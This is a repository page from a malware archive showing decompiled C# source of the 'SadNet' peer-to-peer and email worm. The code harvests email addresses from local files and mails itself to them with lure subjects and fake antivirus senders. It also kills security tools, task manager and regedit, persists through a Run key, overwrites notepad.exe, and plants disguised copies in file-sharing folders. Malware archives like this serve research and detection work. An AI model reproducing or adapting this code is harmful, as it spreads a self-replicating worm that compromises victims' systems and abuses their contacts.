ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2024-12-22 11:26:11 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
71cdcf7dce
MalwareSourceCode/MSIL/P2P-Worm/Win32/S/P2P-Worm.Win32.Small.v-e11f1e1c2820f02fe46d7297e75a556346d661ee4bc64e6f222c74d56cf83bfd/Form1.cs
vxunderground f2ac1ece55 auto-decompiled msil via petikvx 
add
2022-08-18 06:28:56 -05:00

349 lines
11 KiB
C#
Raw Blame History

// Decompiled with JetBrains decompiler
// Type: SadNet.Form1
// Assembly: SadNet, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 7CA2C9C9-C782-4D2C-95AC-6004CBF68D8D
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\P2P-Worm.Win32.Small.v-e11f1e1c2820f02fe46d7297e75a556346d661ee4bc64e6f222c74d56cf83bfd.exe
using Microsoft.Win32;
using System;
using System.ComponentModel;
using System.Diagnostics;
using System.Drawing;
using System.IO;
using System.Text;
using System.Text.RegularExpressions;
using System.Web.Mail;
using System.Windows.Forms;
namespace SadNet
{
public class Form1 : Form
{
private IContainer components;
private Timer mailer;
private Timer killer;
public Form1() => this.InitializeComponent();
private void mailer_Tick(object sender, EventArgs e)
{
try
{
string str1 = new string[20]
{
"mcafee",
"symantec",
"Yahoo!",
"Thank you!",
"Text message",
"Document",
"Incoming Message ",
"Message Notify ",
"Fax Message",
"Protected message",
"panda",
"Encrypted document",
"Account notify",
"E-mail account disabling warning",
"E-mail technical support message.",
"E-mail warning",
"Email account utilization warning.",
"Fax Message Received ",
"Forum notify ",
"do you know AmirCivil?"
}[new Random().Next(0, 20)];
string str2 = new string[5]
{
"AmirCivil.pic.cmd",
"register.pif ",
"sexy-screensaver.scr ",
"fullmessenger.exe",
"readme.html.cmd"
}[new Random().Next(0, 5)];
string str3 = new string[20]
{
"Deliver Error",
"Message Error",
"help attached ",
"such as yours",
"illegal st. of you?",
"is that your name? ",
"picture? ",
"abuse? ",
"is that yours? ",
"I have your password! ",
"classroom test of you? ",
"old photos about you? ",
"i hope thats not true! ",
"does it match? ",
" you know amir_civil?!",
"why should I? ",
"another pic, have fun! ... :->",
"xxx ? ",
"the information is wrong! ",
"love letter? "
}[new Random().Next(0, 20)];
string searchPattern = new string[2]
{
"*txt",
"*html"
}[new Random().Next(0, 2)];
string str4 = new string[20]
{
"mcafee@yahoo.com",
"symantec@yahoo.com",
"nod32@yahoo.com",
"panda@yahoo.com",
"avg@yahoo.com",
"antiblaster@yahoo.com",
"info@yahoo.com",
"ebook@yahoo.com",
"LongShot@yahoo.com",
"iraq@yahoo.com",
"update@yahoo.com",
"matt@yahoo.com",
"steve@yahoo.com",
"smith@yahoo.com",
"stan@yahoo.com",
"bill@yahoo.com",
"bob@yahoo.com",
"YourFriend@yahoo.com",
" mail@yahoo.com",
"ted@yahoo.com"
}[new Random().Next(0, 20)];
string path = new string[5]
{
"C:\\",
"D:\\",
"E:\\",
"G:\\",
"F:\\"
}[new Random().Next(0, 5)];
for (int index = 0; index < 10; ++index)
{
try
{
string[] strArray = new string[3]
{
"C:\\dir1",
"D:\\",
"C:\\windows"
};
foreach (string str5 in strArray)
{
foreach (string file in Directory.GetFiles(path, searchPattern))
{
Regex regex = new Regex("[a-zA-Z0-9-_.-]+@[a-zA-Z0-9-_.-]+\\.[a-zA-Z0-9]+");
FileStream fileStream = new FileStream(file, FileMode.Open, FileAccess.Read);
byte[] numArray = new byte[fileStream.Length];
fileStream.Read(numArray, 0, (int) fileStream.Length);
fileStream.Close();
foreach (Match match in regex.Matches(Encoding.ASCII.GetString(numArray)))
{
string str6 = match.ToString();
try
{
MailMessage message = new MailMessage();
message.From = str4;
message.To = str6;
message.Cc = "info@yahoo.com";
message.Bcc = "password@yahoo.com";
message.Subject = str1;
message.Body = str3;
SmtpMail.SmtpServer = "mx4.mail.yahoo.com";
message.Attachments.Add((object) new MailAttachment(Application.ExecutablePath, MailEncoding.Base64));
SmtpMail.Send(message);
}
catch (Exception ex)
{
}
}
}
}
}
catch (Exception ex)
{
}
}
}
catch (Exception ex)
{
}
}
private void killer_Tick(object sender, EventArgs e)
{
string[] strArray = new string[56]
{
"NPROTECTED",
"GhostTray",
"NAVW32",
"F-AGNT95",
"NOD32",
"NETD32",
"NETMON",
"IOMON98",
"SCAN32",
"NORMIST",
"NAVW3",
"ADAWARE",
"AGENTW",
"LU32",
"NAVAP32",
"ANTIVIR",
"TCM",
"W9X",
"AVKSERV",
"winamp",
"ACKWIN32",
"AD-AWARE",
"ADVXDWIN",
"AGENTSVR",
"AGENTW",
"ANTIVIRUS",
"ANTS",
"APIMONITOR",
"APLICA32",
"ARR",
"AUPDATE",
"AUTODOWN",
"AUTOTRACE",
"AVE32",
"AVGCC32",
"AVGCTRL",
"AVGNT",
"CFINET",
"CLEANPC",
"CTRL",
"AV32",
"DATEMANAGER ",
"DOORS",
"DPFSETUP ",
"FCH32 ",
"FNRB32",
"notepad",
"killer",
"POP3TRAP",
"remind",
"cftmon",
"msmsgs",
"taskmgr",
"regedit",
"vb6",
"ZONEALARM"
};
foreach (Process process in Process.GetProcessesByName(strArray[new Random().Next(0, 56)]))
process.CloseMainWindow();
}
private void hidden_Tick(object sender, EventArgs e)
{
}
private void error_Tick(object sender, EventArgs e)
{
}
private void copy_Tick(object sender, EventArgs e)
{
}
private void amir(object sender, EventArgs e)
{
this.Hide();
try
{
File.Copy(Application.ExecutablePath, Environment.SystemDirectory + "\\winlogon.cab.exe");
Registry.SetValue("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", "SadNet", (object) (Environment.SystemDirectory + "\\winlogon.cab.exe"), RegistryValueKind.ExpandString);
Registry.SetValue("HKEY_CURRENT_USER\\SadNet", "SadNet", (object) "(_-oO]xX|-|S|-|a|-|d|-|N|-|e|-|t|-|Xx[Oo-_)!", RegistryValueKind.ExpandString);
}
catch (Exception ex)
{
}
try
{
File.Move(Environment.SystemDirectory + "\\notepad.exe", Environment.SystemDirectory + "\\AmirCivil.exe");
File.Copy(Application.ExecutablePath, Environment.SystemDirectory + "\\notepad.exe");
}
catch (Exception ex)
{
}
try
{
File.Copy(Application.ExecutablePath, "C:\\symantec.exe");
File.Copy(Application.ExecutablePath, "D:\\fun.pic.scr");
File.Copy(Application.ExecutablePath, "E:\\wow.pif");
File.Copy(Application.ExecutablePath, "F:\\mail.cmd");
File.Copy(Application.ExecutablePath, "C:\\Program Files\\Kazaa\\My Shared Folder\\winampa.dll.pif");
File.Copy(Application.ExecutablePath, "C:\\Program Files\\StreamCast\\Morpheus\\My Shared Folder\\winampa.dll.pif");
File.Copy(Application.ExecutablePath, "C:\\Program Files\\Gnucleus\\Downloads\\AnyDVD.v6.0.0.4.Cracked-RES.by.Warez.exe");
File.Copy(Application.ExecutablePath, "C:\\Program Files\\eMule\\Incoming\\symantec.cmd");
File.Copy(Application.ExecutablePath, "D:\\Program Files\\Kazaa\\My Shared Folder\\winampa.dll.pif");
File.Copy(Application.ExecutablePath, "D:\\Program Files\\StreamCast\\Morpheus\\My Shared Folder\\winampa.dll.pif");
File.Copy(Application.ExecutablePath, "D:\\Program Files\\Gnucleus\\Downloads\\AnyDVD.v6.0.0.4.Cracked-RES.by.Warez.exe");
File.Copy(Application.ExecutablePath, "D:\\Program Files\\eMule\\Incoming\\symantec.cmd");
File.Copy(Application.ExecutablePath, "E:\\Program Files\\Kazaa\\My Shared Folder\\winampa2.dll.pif");
File.Copy(Application.ExecutablePath, "E:\\Program Files\\StreamCast\\Morpheus\\My Shared Folder\\winampa.dll.pif");
File.Copy(Application.ExecutablePath, "E:\\Program Files\\Gnucleus\\Downloads\\AnyDVD.v6.0.0.4.Cracked-RES.by.Warez.exe");
File.Copy(Application.ExecutablePath, "E:\\Program Files\\eMule\\Incoming\\symantec.cmd");
File.Copy(Application.ExecutablePath, "C:\\Program Files\\Kazaa\\My Shared Folder\\winampa.dll.pif");
File.Copy(Application.ExecutablePath, "D:\\Program Files\\Kazaa\\My Shared Folder\\project.exe");
File.Copy(Application.ExecutablePath, "J:\\Program Files\\Kazaa\\My Shared Folder\\SkyNetAntiVirus.doc.cmd");
File.Copy(Application.ExecutablePath, "E:\\Program Files\\Kazaa\\My Shared Folder\\screen_saver!.scr");
File.Copy(Application.ExecutablePath, "F:\\Program Files\\Kazaa\\My Shared Folder\\winlogon.dll.exe");
File.Copy(Application.ExecutablePath, "H:\\Program Files\\Kazaa\\My Shared Folder\\fun.pic.scr");
}
catch (Exception ex)
{
}
try
{
api.ShowWindow(api.FindWindow("ConsoleWindowClass", (string) null), 0);
api.ShowWindow(api.FindWindow("#32770", (string) null), 0);
api.ShowWindow(api.FindWindow("MGHTML_DLG_CLASS", (string) null), 0);
api.ShowWindow(api.FindWindow("NAVAP Wnd Clas", (string) null), 0);
api.ShowWindow(api.FindWindow("RegEdit_RegEdit", (string) null), 0);
api.ShowWindow(api.FindWindow("notepad", (string) null), 0);
}
catch (Exception ex)
{
}
}
private void hien_Tick(object sender, EventArgs e)
{
}
private void mail2_Tick(object sender, EventArgs e)
{
}
protected override void Dispose(bool disposing)
{
if (disposing && this.components != null)
this.components.Dispose();
base.Dispose(disposing);
}
private void InitializeComponent()
{
this.components = (IContainer) new Container();
this.mailer = new Timer(this.components);
this.killer = new Timer(this.components);
this.SuspendLayout();
this.mailer.Enabled = true;
this.mailer.Interval = 30000;
this.mailer.Tick += new EventHandler(this.mailer_Tick);
this.killer.Enabled = true;
this.killer.Tick += new EventHandler(this.killer_Tick);
this.AutoScaleDimensions = new SizeF(6f, 13f);
this.AutoScaleMode = AutoScaleMode.Font;
this.ClientSize = new Size(292, 266);
this.Name = nameof (Form1);
this.Text = "SadNet";
this.Activated += new EventHandler(this.amir);
this.ResumeLayout(false);
}
}
}
Reference in New Issue View Git Blame Copy Permalink